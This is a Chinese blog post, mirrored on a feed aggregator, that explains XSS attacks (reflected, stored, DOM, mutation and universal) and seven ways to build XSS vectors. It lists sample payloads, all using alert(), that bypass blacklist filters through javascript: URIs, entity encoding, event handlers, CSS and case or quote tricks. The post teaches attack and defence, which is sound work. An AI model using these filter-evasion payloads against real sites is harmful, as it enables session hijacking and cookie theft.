惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

T
Threatpost
aimingoo的专栏
aimingoo的专栏
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
T
Tailwind CSS Blog
J
Java Code Geeks
博客园_首页
Google Online Security Blog
Google Online Security Blog
Hugging Face - Blog
Hugging Face - Blog
C
CXSECURITY Database RSS Feed - CXSecurity.com
I
Intezer
P
Palo Alto Networks Blog
V
Vulnerabilities – Threatpost
雷峰网
雷峰网
O
OpenAI News
SecWiki News
SecWiki News
小众软件
小众软件
酷 壳 – CoolShell
酷 壳 – CoolShell
美团技术团队
N
News | PayPal Newsroom
Project Zero
Project Zero
Forbes - Security
Forbes - Security
IT之家
IT之家
A
Arctic Wolf
WordPress大学
WordPress大学
Jina AI
Jina AI
T
Tor Project blog
博客园 - 三生石上(FineUI控件)
S
Secure Thoughts
Google DeepMind News
Google DeepMind News
Attack and Defense Labs
Attack and Defense Labs
博客园 - 聂微东
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
P
Privacy International News Feed
Cloudbric
Cloudbric
G
GRAHAM CLULEY
博客园 - 叶小钗
H
Hacker News: Front Page
腾讯CDC
量子位
Help Net Security
Help Net Security
人人都是产品经理
人人都是产品经理
C
Cyber Attacks, Cyber Crime and Cyber Security
月光博客
月光博客
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
宝玉的分享
宝玉的分享
爱范儿
爱范儿
L
Lohrmann on Cybersecurity
Hacker News - Newest:
Hacker News - Newest: "LLM"
Recorded Future
Recorded Future
C
CERT Recently Published Vulnerability Notes

陈少文的网站

巨变与机遇的未来十年 Kubernetes 平台管理软件压力测试方案 使用镜像部署 Hexo 静态页面 终于等到你 - GitHub 镜像仓库服务(ghcr.io) 一起来学 Go --(6)Interface 一起来学 Go --(5)Goroutine 和 Channel 什么是函数式编程 如何在 Kubernetes 集群集成 Kata 柯里化与偏函数 使用 PyGithub 自动创建 Label 软件产品是团队能力的输出 Helm 2 、Helm 3 比较 IoT 变现 Kubernetes 中的 DNS 服务 国内的 Helm 镜像源 Harbor 使用自签证书支持 Https 访问 DevOps 工具链之 Prow 如何使用 kfctl 安装 Kubeflow VS Code 无法下载 Go 插件的工具包 工程师更应具有服务精神 你不知道的 Docker 使用技巧 使用 Docker 运行 Tensorflow 论中国 什么是左移 如何清空 Git 仓库全部历史记录 一禅小和尚 有风吹过厨房 时间的玫瑰 如何在 CentOS 安装 GPU 驱动 开发 Tips(19) 使用 Velero 备份 Kubernetes 集群 Kubernetes Cheat Sheet 开发 Tips(18) 如何构建一个 Java 工程 开发 Tips(17) KubeSpray 安装 Kubernetes 报错 ip in ansible_all_ipv4_addresses 基于 Kubernetes 和 Jenkins 搭建自动化测试系统 在 Kubernetes 上动态创建 Jenkins Slave 使用 Jenkins 进行服务拨测 开发 Tips(16) Kubernetes 签发 Ingress 证书及日常故障运维 Kubernetes 中 Deployment 的基本操作 Kubernetes 中的证书 如何使用 KubeBuilder 开发一个 Operator Kubernetes 1.6.0 安装问题汇总 镜像管理工具 -- Harbor 开发 Tips(15) Docker 如何拉取镜像 开发 Tips(14) 使用 Helm 安装 harbor 开发 Tips(13) 使用 S2I 构建云原生应用 在 Kubernetes 中使用 emptyDir、hostPath、localVolume 开发 Tips(12) 开发 Tips(11) 代码质量分析工具 SonarQube 使用 Kubeadm 安装 Kubernetes 集群 一起来学 Go --(4)常用函数 Kubernetes 中的 Ceph Kubernetes 之 Volumes Kubernetes 之 Labels、Selectors 开发 Tips(10) 开源正在重构商业模式 Kubernetes 之网络 Kubernetes 之 API 使用 Helm 和 Operator 快速部署 Prometheus Kubernetes 复杂有状态应用管理框架 -- Operator Kubernetes 的包管理器 -- Helm 一起来学 Go --(3)Go Modules 如何一步一步地优化博客方案 kubectl 实用指南 Kubernetes 中的基本概念 搭建远程 Kubernetes 开发环境 大公司和小公司的 ToB 思路 开发 Tips(9) Go 入门指南 一起来学 Go --(2)数据与逻辑结构 如何预防 Web 富文本中的 XSS 攻击 django-xss-cleaner 云工作时代 一起来学 Go --(1)背景与特点 SaaS 开发团队的不同阶段 你不知道的 Git 使用技巧 输出既服务 微服务设计 继续奔跑 开发 Tips(8) 从账户安全到二次验证 Django 性能之数据库查询优化 Django 性能之分库分表 敏捷开发之研发流程 打造一致性的团队 开发 Tips(7) Pytest 进阶学习之 Mock PaaS 部署之 buildpack Go 开发配置 领域输出才是 PaaS 的核心竞争力 Pytest 入门学习 开发 Tips(6) 如何使用 Jenkins、Docker、GitLab 搭建 Django 自动化部署流程
XSS 原理、构造
微信公众号 · 2017-05-17 · via 陈少文的网站

Please enable Javascript to view the contents

XSS是一种在前端执行JavaScript脚本的攻击方式。随着UGC站点的流行,用户产生数据剧增,数据块的网络连接越来越有利于XSS的实施与传播。XSS带来的危害有:窃取用户cookies,窃取个人信息;劫持会话,操纵用户网络数据;发起ddos攻击; 篡改页面、弹出广告等。

1. 名词解释

  • XSS。
    全称Cross Site Script,跨站脚本攻击。
  • XSS向量。
    通常将,一段用于XSS攻击的代码片段称之为XSS向量。比如:
1
<script>alert(/This is a xss test!/)</script>
  • XSS Filter。
    即跨站脚本过滤器。用于分析用户输入和提交的数据,消除潜在的XSS、恶意的HTML或简单的HTML格式错误。一般,XSS Filter是基于黑白名单的安全过滤策略实施的。比如,仅允许特定的输入字符,或仅阻止特定的输入字符。

2. XSS原理

所有来自COOKIE、POST表单、GET请求、HTTP头的内容都可能是XSS攻击的入口。
下面以窃取cookie为例,描述XSS的攻击链路。

2.1 反射型XSS

反射型XSS是一种最常见的XSS方式。XSS向量,通常附加在URL中,诱导用户点击。

攻击链路:

  1. 攻击者精心构造一个包含恶意字符串的 URL,将其发送给受害者
  2. 攻击者欺骗受害者,使其访问该 URL
  3. 网站在响应中包含了来自 URL 的恶意字符串
  4. 受害者浏览器执行了响应中的恶意字符串,将自己的 cookie 发送到了攻击者的服务器

2.2 存储型XSS

存储型XSS是一种危害很大的XSS方式。通过表单等输入,提交XSS向量,存入数据库。在信息的输出页面,执行XSS向量。在UGC站点,存储型XSS传播速度很快,如果不及时制止,会产生很大影响。

攻击链路:

  1. 攻击者利用网站的表单插入恶意字符串到网站数据库
  2. 受害者请求网站页面
  3. 网站在响应中包含来自数据库的恶意字符串,并返回给受害者
  4. 受害者的浏览器执行了响应中的恶意字符串,将受害者的 cookie 发送到了攻击者的服务器

2.3 DOM Based XSS

DOM Based XSS,是通过修改受害者浏览器中的DOM环境,来执行攻击的。也就是说,页面响应不会更改,但是由于DOM环境中发生的恶意修改,页面中攻击脚本能够被执行。

攻击链路:

  1. 攻击者构造一个包含恶意字符串的 URL,将其发送给受害者。
  2. 攻击者欺骗受害者,使其访问了该 URL
  3. 网站接收到响应,但是响应中并不包含恶意字符串
  4. 受害者浏览器执行响应中合法的 JavaScript,导致恶意代码插入到了页面中
  5. 受害者浏览器执行插入到页面中的恶意代码,将 cookie 发送到了攻击者的服务器

2.4 MXSS

突变XSS,浏览器的解析引擎将一段没有威胁的代码渲染成具有威胁的XSS攻击代码,攻击代码可能被js或是其他流程输出到DOM中或是在其他地方被再次渲染导致XSS的执行。这种XSS利用方式具有很强的攻击性。

攻击链路:

  1. 攻击者精心构造一个包含非敏感字符串的URL,将其发送给受害者
  2. 攻击者欺骗受害者,使其访问该 URL
  3. 网站在响应中包含了来自URL的字符串
  4. 浏览器将响应中的非敏感字符串,渲染成可执行的XSS攻击代码。
  5. 受害者浏览器执行了响应中的恶意字符串,将自己的 cookie 发送到了攻击者的服务器

2.5 UXSS

浏览器通用型XSS,利用浏览器或浏览器插件漏洞来构造XSS。不同于其他XSS方式,只能获取同源(同协议、同域名、同端口)信息。UXSS能够对没有漏洞的页面发起攻击。

3. XSS构造方式

这里列出了七种方法:

3.1 利用<>标记注入HTML/JavaScript

如果能够引入<>标记,可以直接构造JavaScript编写的XSS向量,就可以成功注入。这部分的关键在于找到可以回显的输入点,闭合<之前的字符配对。

1
<script>alert(/XSS/)</script>

3.2 利用HTML标签属性执行XSS

很多HTML标记的属性都支持JavaScript:[code] 伪协议,这类特殊的协议由JavaScript的解释器运行,所以用户可以利用部分HTML标记的属性进行XSS。如下面的代码:

1
2
<img src = "javascript:alert(/XSS1/);">
<table background = "javascript:alert(/XSS2/)"></table>

但并不是所有浏览器支持伪协议。

3.3 利用空格、回车、Tab等分隔符

由于通常XSS Filter采取的黑名单策略,不一定将全部分隔符列为敏感字符。JavaScript语法中以下三种方式都能编写合法的语句:

  • 如果JavaScript引擎确定一个句子完成,而行尾有换行符,那么分号可以省略。
  • 如果一行中有多个句子,那么每句都得用分号结束。
  • 额外的空白无论以何种方式添加都可以,在构成一个完整的语句或遇到分号之前不会结束。
    这里就是利用了第三条,拆分敏感字符,绕过XSS Filter
1
2
3
<img src = "javas
cript:
alert(/XSS/)" width = "100">

3.4 对标签的属性值转码

Web系统对于普通HTML标记的属性进行过滤,还可以通过编码处理来绕过。因为HTML中属性本身支持ASCII码形式。

1
2
3
<img src = "javascript:alert(/XSS/);">
替换成
<img src = "javascrip&#116&#58alert(/XSS/);">

3.5 产生自己的事件

JavaScript与HTML之间的交互是通过事件来实现的,比如click、mouseover等动作触发事件处理函数执行。事件可以让javaScript执行,当然也可以用来执行XSS脚本。

1
<img src = "#" onerror = alert(/XSS/)>

3.6 利用CSS跨站解析

XSS跨站脚本的另一个载体是CSS样式表,使用CSS样式表执行JavaScript具有隐蔽、灵活多变等特点,但是有一个很大的缺点是:各浏览器之间不能通用,甚至同一浏览器的不同版本之间都不能通用。使用CSS直接执行JavaScript代码的示例如下:

1
<div style="background-image: url(javascript:alert('XSS'))">

3.7 扰乱过滤规则

利用前面叙述的各种技巧,包括HTML标签属性值、事件、CSS、编码技术等,攻击者能顺利绕过XSS Filter的重重过滤。

但是,开发者在开发过程中,可能也已经考虑到各种触发XSS的情况,让系统变得更加牢固安全。但是攻击者的手段是多种多样的,看看这些示例:

一个正常的XSS输入:

1
<img src = "javascript:alert(1);">

转换大小写后的XSS:

1
<IMG SRC = "javascript:alert(1);">

大小写混淆的XSS:

1
<ImG SRc = "jAVasCRIpT:AlerT(1);">

不用双引号,而是使用单引号的XSS:

1
<img src='javascript:alert(0):'>

不使用引号的XSS:

1
<img src=javascript:alert(0);>

其他:

1
<img/src="javascript:alert('XSS');">

4. 参考


微信公众号